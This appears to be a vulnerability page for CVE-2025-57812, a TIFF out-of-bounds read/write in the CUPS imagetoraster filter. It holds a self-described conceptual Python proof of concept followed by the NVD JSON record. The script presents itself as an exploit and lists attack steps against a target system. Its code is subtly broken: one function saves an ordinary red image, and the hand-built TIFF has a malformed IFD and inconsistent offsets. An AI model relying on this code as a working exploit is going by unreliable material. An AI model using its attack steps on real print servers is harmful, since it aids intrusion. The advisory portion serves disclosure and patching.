CVE-2025-57812

#!/usr/bin/env python3 """ CVE-2025-57812 PoC - CUPS imagetoraster TIFF OOB Read/Write Note: This is a conceptual PoC for educational purposes only. """ from PIL import Image import struct import os def create_malicious_tiff(output_path): """ Create a malicious TIFF file that triggers the OOB vulnerability. The vulnerability occurs when: 1. Image has specific dimensions 2. Bytes per pixel value can be controlled via print options 3. The filter processes pixels with size = pixels * 3 instead of pixels * bytes_per_pixel """ # Create a simple TIFF image width, height = 100, 100 img = Image.new('RGB', (width, height), color='red') img.save(output_path, format='TIFF') print(f"[+] Created TIFF file: {output_path}") print(f"[+] Image dimensions: {width}x{height}") print("[*] To trigger vulnerability, print this file with options that set bytes-per-pixel=1") return output_path def create_exploit_tiff_manual(output_path): """ Manual TIFF construction for more control over exploit parameters. """ # TIFF header tiff_header = b'II' # Little-endian tiff_header += struct.pack('<H', 42) # TIFF magic number tiff_header += struct.pack('<I', 8) # Offset to first IFD # IFD entries # ImageWidth ifd = struct.pack('<HHII', 256, 3, 1, 100) # SHORT, count=1, value=100 # ImageLength ifd += struct.pack('<HHII', 257, 3, 1, 100) # SHORT, count=1, value=100 # BitsPerSample ifd += struct.pack('<HHII', 258, 3, 1, 8) # SHORT, count=1, value=8 # Compression ifd += struct.pack('<HHII', 259, 3, 1, 1) # SHORT, no compression # PhotometricInterpretation ifd += struct.pack('<HHII', 262, 3, 1, 2) # SHORT, RGB # StripOffsets ifd += struct.pack('<HHII', 273, 4, 1, 8 + 26) # LONG # SamplesPerPixel ifd += struct.pack('<HHII', 277, 3, 1, 3) # SHORT, 3 for RGB # RowsPerStrip ifd += struct.pack('<HHII', 278, 3, 1, 100) # SHORT # StripByteCounts ifd += struct.pack('<HHII', 279, 4, 1, 100 * 100 * 3) # LONG # IFD ending ifd += struct.pack('<I', 0) # Next IFD offset # Image data (malformed to trigger OOB) image_data = b'\x41' * (100 * 100 * 3) with open(output_path, 'wb') as f: f.write(tiff_header + ifd + image_data) print(f"[+] Created exploit TIFF: {output_path}") if __name__ == '__main__': print("=" * 60) print("CVE-2025-57812 PoC - CUPS imagetoraster OOB Vulnerability") print("=" * 60) output_file = "malicious_cups.tif" create_malicious_tiff(output_file) print("\n[*] Attack scenario:") print("1. Upload the malicious TIFF to target system") print("2. Submit print job with options to set output format") print("3. CUPS imagetoraster filter processes the file") print("4. OOB read/write occurs due to buffer size mismatch") print("\n[!] Use only in authorized testing environments")

{"cve": {"id": "CVE-2025-57812", "sourceIdentifier": "[email protected]", "published": "2025-11-12T19:15:36.753", "lastModified": "2026-01-20T18:11:14.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CUPS is a standards-based, open-source printing system, and `libcupsfilters` contains the code of the filters of the former `cups-filters` package as library functions to be used for the data format conversion tasks needed in Printer Applications. In CUPS-Filters versions up to and including 1.28.17 and libscupsfilters versions 2.0.0 through 2.1.1, CUPS-Filters's `imagetoraster` filter has an out of bounds read/write vulnerability in the processing of TIFF image files. While the pixel buffer is allocated with the number of pixels times a pre-calculated bytes-per-pixel value, the function which processes these pixels is called with a size of the number of pixels times 3. When suitable inputs are passed, the bytes-per-pixel value can be set to 1 and bytes outside of the buffer bounds get processed. In order to trigger the bug, an attacker must issue a print job with a crafted TIFF file, and pass appropriate print job options to control the bytes-per-pixel value of the output format. They must choose a printer configuration under which the `imagetoraster` filter or its C-function equivalent `cfFilterImageToRaster()` gets invoked. The vulnerability exists in both CUPS-Filters 1.x and the successor library libcupsfilters (CUPS-Filters 2.x). In CUPS-Filters 2.x, the vulnerable function is `_cfImageReadTIFF() in libcupsfilters`. When this function is invoked as part of `cfFilterImageToRaster()`, the caller passes a look-up-table during whose processing the out of bounds memory access happens. In CUPS-Filters 1.x, the equivalent functions are all found in the cups-filters repository, which is not split into subprojects yet, and the vulnerable code is in `_cupsImageReadTIFF()`, which is called through `cupsImageOpen()` from the `imagetoraster` tool. A patch is available in commit b69dfacec7f176281782e2f7ac44f04bf9633cfa."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openprinting:cups-filters:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.28.17", "matchCriteriaId": "42C7C112-8589-4446-9913-BE797ECE4EC7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openprinting:libcupsfilters:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.1.1", "matchCriteriaId": "4EA9B74A-E657-47C1-9E51-C028FF6656EF"}]}]}], "references": [{"url": "https://github.com/OpenPrinting/cups-filters/blob/3c58463e341b12c9d30d7d3807d2bac1bc595a78/cupsfilters/image-tiff.c#L34", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/OpenPrinting/cups-filters/blob/3c58463e341b12c9d30d7d3807d2bac1bc595a78/filter/imagetoraster.c#L613", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/OpenPrinting/libcupsfilters/blob/33421982e10f6a14bc0bab03b80c9cf4660e8d7d/cupsfilters/image-tiff.c#L32", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/OpenPrinting/libcupsfilters/commit/b69dfacec7f176281782e2f7ac44f04bf9633cfa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-jpxg-qc2c-hgv4", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/12/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}